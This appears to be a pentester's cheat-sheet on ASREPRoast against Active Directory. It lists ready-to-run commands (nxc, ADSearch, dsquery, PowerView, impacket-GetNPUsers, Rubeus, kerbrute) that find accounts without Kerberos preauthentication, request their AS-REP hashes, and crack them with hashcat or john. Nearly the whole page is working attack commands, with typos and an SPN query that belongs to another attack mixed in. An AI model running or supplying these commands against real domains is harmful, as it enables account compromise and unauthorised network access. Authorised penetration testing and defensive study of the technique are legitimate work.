🫢

ASREPRoast

Tags
KerberosUnauthenticatedInitial Access

Identify

nxc ldap <IP> -u '' -p '' --query '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' ""
Remote
ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
Local
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl
using dsqeury (elevated context required) (local only)
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontro
Local (powerview)

Exploit

Ask for TGS

nxc ldap <IP> -u '<USER>' -p '' --asreproast output.txt
Remote
impacket-GetNPUsers domain.local/svc-test -no-pass
Remote
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt /user:svc-test /nowrap
Local
Get-ASREPHash -Username svc-test -verbose
Local - https://github.com/HarmJ0y/ASREPRoast
kerbrute userenum -d domain.local --dc <dcip> users.txt 
remote

Crack ticket

hashcat -m 18200 --force -a 0 hashes.txt <wordlist>
john --wordlist=<wordlist> hashes.txt